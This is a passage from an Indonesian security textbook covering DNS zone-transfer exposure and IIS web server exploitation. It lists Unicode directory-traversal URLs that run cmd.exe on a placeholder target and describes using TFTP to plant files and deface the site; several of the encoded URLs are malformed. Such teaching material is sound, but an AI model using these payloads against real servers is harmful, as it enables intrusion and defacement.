a-tips> Latihan 11. Cari informasi tentang nama-nama dari name server
(NS) domain anda atau domain perusahaan anda. Informasi
apa saja yang dapat anda peroleh dari data-data DNS
tersebut? Nomor IP apa saja yang dapat anda peroleh dari
data-data DNS tersebut?
Informasi DNS memang tersedia untuk umum. Akan tetapi seharusnya
informasi yang komplit hanya boleh dilihat oleh server tertentu. Istilahnya,
“zone transfer” hanya diperbolehkan untuk server tertentu saja.Eksploitasi Web Server
Web server menyediakan jasa untuk publik. Dengan demikian dia harus
berada di depan publik. Sayangnya banyak lubang keamanan dalam
implementasi beberapa web server. Di bagian ini akan dicontohkan
beberapa eksploitasi tersebut.
Defacing Microsoft IIS
Salah satu lubang keamanan dari web yang berbasis IIS adalah adanya
program atau script yang kurang baik implementasinya. Sebagai contoh,
bugtraq id 1806 menujukkan cara untuk melihat isi direktori dari sebuah
web server yang berbasis IIS. (Informasi lengkapnya ada di http://
www.securityfocus.com/bid/1806).
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/ c+dir http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/ c+dir http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/ c+dir http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/ c+dir http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/ c+dir http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/ c+dir http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/ c+dir
Perintah di atas menjalankan perintah “dir” untuk melihat direktori di server
IIS tersebut. Selain melihat direktori dengan perintah “dir”, anda dapat juga
menjalankan perintah lain di server tersebut, seperti misalnya meng-copy
file. Salah satu exploit adalah dengan mengambil file dari sebuah tempat
dengan “TFTP” ke server IIS tersebut. Prinsipnya adalah menggunakan
perintah yang command line sebagai perintah “dir” tersebut, seperti dnegan
printah “tftp” dan menggantikan spasi dengan tanda tambah (+). Setelah itu,
file dapat ditempatkan dimana saja termasuk di direktori yang digunakan
untuk memberikan layanan web. Atau dengan kata lain web tersebut dapat
diubah (deface).
|
